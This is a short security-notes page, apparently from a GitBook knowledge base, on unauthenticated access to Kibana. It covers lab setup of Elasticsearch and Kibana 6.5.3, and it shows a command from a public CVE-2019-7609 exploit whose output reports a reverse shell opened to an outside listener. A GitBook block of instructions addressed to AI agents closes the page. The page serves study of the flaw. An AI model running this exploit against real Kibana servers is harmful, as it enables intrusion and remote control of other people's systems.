> For the complete documentation index, see [llms.txt](https://icybersec.gitbook.io/cybersecuritynote-en/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://icybersec.gitbook.io/cybersecuritynote-en/security-vulnerability/unauthorized-vulnerability/unauthorized-access-vulnerability-in-kibana.md).

# Unauthorized Access Vulnerability in Kibana

## Vulnerability Description

The Kibana Unauthorized Access Vulnerability refers to a situation where, without proper authentication and authorization configuration, an unauthenticated user can access Kibana's dashboard, data, and other sensitive information. This vulnerability may result in data leaks, attackers controlling the Kibana environment, and other security threats.

## Environment Setup

Install elasticsearch

```
cd /opt
wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-6.5.3.tar.gz
tar -zxvf elasticsearch-6.5.3.tar.gz
cd elasticsearch-6.5.3
useradd es
chmod 777 -R /opt/elasticsearch-6.5.3
./bin/elasticsearch
```

![image-20220726162834227](/files/Lk7QZ66Huuyr3wdALMBv)

Install kibana

```
wget https://artifacts.elastic.co/downloads/kibana/kibana-6.5.3-linux-x86_64.tar.gz
tar xvf kibana-6.5.3-linux-x86_64.tar.gz
cd kibana-6.5.3-linux-x86_64
./bin/kibana
```

Access port 5601 in a browser.

![image-20220726163136064](/files/UdNfHLlmVzoUiHasKhGf)

## Vulnerability Exploitation

exp：<https://github.com/LandGrey/CVE-2019-7609>

```
[root@localhost CVE-2019-7609-master]# python CVE-2019-7609-kibana-rce.py -u 127.0.0.1:5601 -host 192.168.32.130 -port 9999 --shell
[+] http://127.0.0.1:5601 maybe exists CVE-2019-7609 (kibana < 6.6.1 RCE) vulnerability
[+] reverse shell completely! please check session on: 192.168.32.130:9999
```

![image-20230130131026778](/files/mWQD4CQE0hMflr0c57sR)


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://icybersec.gitbook.io/cybersecuritynote-en/security-vulnerability/unauthorized-vulnerability/unauthorized-access-vulnerability-in-kibana.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.